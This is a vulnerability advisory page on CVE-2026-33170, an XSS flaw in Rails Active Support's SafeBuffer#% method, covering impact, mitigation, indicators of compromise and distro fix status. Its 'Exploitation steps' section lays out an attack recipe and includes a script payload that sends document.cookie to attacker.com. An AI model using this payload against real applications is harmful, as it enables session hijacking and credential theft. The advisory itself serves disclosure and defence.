CVE-2026-33170: 
Ruby vulnerability analysis and mitigation

Overview

CVE-2026-33170 is a Cross-Site Scripting (XSS) vulnerability in the Active Support component of Ruby on Rails, specifically in the SafeBuffer#% method. The flaw was responsibly disclosed by researcher @ch4n3-yoon and published on March 23, 2026. It affects all Rails versions prior to 7.2.3.1, versions 8.0.0 through 8.0.4.1 (exclusive), and versions 8.1.0 through 8.1.2.1 (exclusive). The vulnerability carries a CVSS v3.1 base score of 6.1 (Medium) and a CVSS v4.0 base score of 5.3 (Medium) (GitHub Advisory, Feedly).

Technical details

The root cause is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation). In Active Support's SafeBuffer class, the #% formatting operator creates a new buffer but fails to propagate the @html_unsafe flag from the source buffer to the newly created one. When a SafeBuffer is mutated in-place (e.g., via gsub!), the mutation correctly marks the buffer as unsafe; however, if that unsafe buffer is subsequently formatted using % with untrusted user-supplied arguments, the resulting buffer incorrectly reports html_safe? == true. This causes ERB's auto-escaping mechanism to skip HTML encoding of the output, allowing unescaped malicious content to be rendered in the browser. The fix, applied across three patch commits, ensures the @html_unsafe flag is explicitly propagated to the new buffer created by #% (GitHub Advisory, Patch Commit).

Impact

Successful exploitation allows an attacker to inject and execute arbitrary JavaScript in the context of a victim user's browser session, bypassing Rails' built-in ERB auto-escaping protections. The primary impacts are to confidentiality (e.g., session token theft, credential harvesting) and integrity (e.g., DOM manipulation, phishing content injection), with no direct availability impact. Exploitation requires user interaction — a victim must visit or be directed to a page rendering the maliciously crafted content — and the scope is changed, meaning the attacker can affect resources beyond the vulnerable application itself. Downstream IBM products including Aspera Faspex, Aspera Shares, Aspera Enterprise WebApps, CloudPak for AIOps, and License Metric Tool are also affected (GitHub Advisory, IBM Aspera Faspex).

Exploitability

There is no public proof-of-concept exploit code and no evidence of in-the-wild exploitation at this time (Feedly). The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. The EPSS score is approximately 0.018% (0.000180), indicating a very low probability of exploitation in the near term. Exploitation requires a specific code pattern — in-place mutation of a SafeBuffer followed by % formatting with attacker-controlled input — which limits the attack surface to applications using this particular combination.

Exploitation steps

  1. Identify a vulnerable target: Locate a Rails application running Active Support versions prior to 7.2.3.1, 8.0.4.1, or 8.1.2.1 that renders user-supplied input through a code path involving in-place SafeBuffer mutation followed by % formatting.
  2. Locate the vulnerable code pattern: Find application code where a SafeBuffer is mutated in-place (e.g., buffer.gsub!(pattern, replacement)) and then formatted with % using user-controlled data (e.g., buffer % { name: user_input }).
  3. Craft a malicious payload: Prepare an XSS payload as the untrusted argument, such as <script>document.location='https://attacker.com/steal?c='+document.cookie</script>.
  4. Deliver the payload: Submit the malicious input through the application's input vector (e.g., a form field, URL parameter, or API request) that feeds into the vulnerable % formatting call.
  5. Trigger victim rendering: Cause a victim user to load the page that renders the output — since html_safe? incorrectly returns true, ERB skips escaping and the script executes in the victim's browser, enabling session hijacking, credential theft, or further attacks (GitHub Advisory, Patch Commit).

Indicators of compromise

  • Logs: Web server or Rails application logs showing unexpected script tags or JavaScript event handlers (e.g., <script>, onerror=, onload=) in request parameters that are subsequently reflected in HTTP responses.
  • Network: Outbound requests from victim browsers to attacker-controlled domains shortly after loading specific application pages; unusual Referer headers in external requests originating from the application's domain.
  • Application Behavior: ERB-rendered pages containing unescaped HTML special characters (<, >, ") in fields that should be HTML-encoded; unexpected JavaScript execution reported by browser security tools or Content Security Policy (CSP) violation reports.
  • File System: If the XSS is used to deliver a secondary payload, look for unexpected files downloaded to victim endpoints or new browser extensions installed without user consent.

Mitigation and workarounds

The primary remediation is to upgrade Rails Active Support to one of the patched versions: 7.2.3.1, 8.0.4.1, or 8.1.2.1, all released on March 23, 2026 (Rails Release, GitHub Advisory). For systems that cannot be immediately updated, apply strict input validation and additional output encoding as defense-in-depth measures, and audit application code for patterns that mutate SafeBuffer objects in-place (via gsub!, sub!, etc.) followed by % formatting with user-supplied data. IBM has released separate security bulletins for affected products including Aspera Faspex, Aspera Shares, Aspera Enterprise WebApps, CloudPak for AIOps, and License Metric Tool (IBM Aspera Faspex).

Community reactions

The Rails core team published an official release announcement and security advisory on March 23, 2026, crediting researcher @ch4n3-yoon for responsible disclosure (GitHub Advisory, Rails Blog). The vulnerability was rated "Low" severity by the Rails team in their advisory, though NVD and Red Hat assigned it a Medium CVSS score. IBM subsequently issued multiple security bulletins for downstream products affected by this dependency, indicating broad ecosystem impact (IBM Aspera Faspex).

Additional resources

Linux Distribution fix status

Fix availability across major Linux distributions and their releases.

Debian

Fixed

bookworm

rails

Affected

sid

rails: 2:7.2.3.1+dfsg-1

Fixed

trixie

rails

Affected

Ubuntu

Unknown

bionic (esm-apps)

rails

Unknown

devel

rails

Unknown

focal (esm-apps)

rails

Unknown

jammy

rails

Unknown

jammy (esm-apps)

rails

Unknown

noble

rails

Unknown

noble (esm-apps)

rails

Unknown

resolute

rails

Unknown

RHEL / CentOS

Unknown

Source: This report was generated using AI

Related Ruby vulnerabilities:

CVE ID

Severity

Score

Technologies

Component name

CISA KEV exploit

Has fix

Published date

CVE-2026-55107CRITICAL10
  • Ruby logoRuby
  • kobako
NoYesSep 30, 2026
CVE-2026-67989HIGH7.5
  • Ruby logoRuby
  • ruby_llm
NoYesOct 02, 2026
CVE-2026-67987HIGH7.5
  • Ruby logoRuby
  • ruby_llm
NoYesSep 29, 2026
CVE-2026-12545MEDIUM6.7
  • Ruby logoRuby
  • hammer_cli
NoYesOct 01, 2026
GHSA-mwm8-39rw-8826MEDIUM6.3
  • Ruby logoRuby
  • sqlite3
NoYesOct 02, 2026

Free Vulnerability Assessment

Benchmark your Cloud Security Posture

Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.

Request assessment

Get a personalized demo

Ready to see Wiz in action?

"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management